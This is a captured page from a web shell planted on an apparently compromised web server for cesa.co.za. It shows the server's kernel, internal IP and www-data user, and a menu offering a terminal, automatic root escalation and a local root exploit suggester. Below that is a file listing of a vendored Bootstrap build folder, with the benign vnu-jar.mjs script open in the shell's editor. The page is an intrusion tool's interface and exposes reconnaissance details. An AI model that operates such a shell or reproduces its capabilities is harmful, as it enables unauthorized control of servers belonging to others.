Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
vendor /
twbs /
bootstrap /
build /
Delete
Unzip
Name
Size
Permission
Date
Action
banner.mjs
620
B
-rw-r--r--
2024-02-14 08:50
build-plugins.mjs
2.83
KB
-rw-r--r--
2024-02-14 08:50
change-version.mjs
2.73
KB
-rw-r--r--
2024-02-14 08:50
generate-sri.mjs
1.7
KB
-rw-r--r--
2024-02-14 08:50
postcss.config.mjs
311
B
-rw-r--r--
2024-02-14 08:50
rollup.config.mjs
1.43
KB
-rw-r--r--
2024-02-14 08:50
vnu-jar.mjs
1.9
KB
-rw-r--r--
2024-02-14 08:50
zip-examples.mjs
2.77
KB
-rw-r--r--
2024-02-14 08:50
Save
Rename
#!/usr/bin/env node /*! * Script to run vnu-jar if Java is available. * Copyright 2017-2023 The Bootstrap Authors * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */ import { execFile, spawn } from 'node:child_process' import vnu from 'vnu-jar' execFile('java', ['-version'], (error, stdout, stderr) => { if (error) { console.error('Skipping vnu-jar test; Java is probably missing.') console.error(error) return } console.log('Running vnu-jar validation...') const is32bitJava = !/64-Bit/.test(stderr) // vnu-jar accepts multiple ignores joined with a `|`. // Also note that the ignores are string regular expressions. const ignores = [ // "autocomplete" is included in <button> and checkboxes and radio <input>s due to // Firefox's non-standard autocomplete behavior - see https://bugzilla.mozilla.org/show_bug.cgi?id=654072 'Attribute “autocomplete” is only allowed when the input type is.*', 'Attribute “autocomplete” not allowed on element “button” at this point.', // Per https://www.w3.org/TR/html-aria/#docconformance having "aria-disabled" on a link is // NOT RECOMMENDED, but it's still valid - we explain in the docs that it's not ideal, // and offer more robust alternatives, but also need to show a less-than-ideal example 'An “aria-disabled” attribute whose value is “true” should not be specified on an “a” element that has an “href” attribute.' ].join('|') const args = [ '-jar', `"${vnu}"`, '--asciiquotes', '--skip-non-html', '--Werror', `--filterpattern "${ignores}"`, '_site/', 'js/tests/' ] // For the 32-bit Java we need to pass `-Xss512k` if (is32bitJava) { args.splice(0, 0, '-Xss512k') } console.log(`command used: java ${args.join(' ')}`) return spawn('java', args, { shell: true, stdio: 'inherit' }) .on('exit', process.exit) })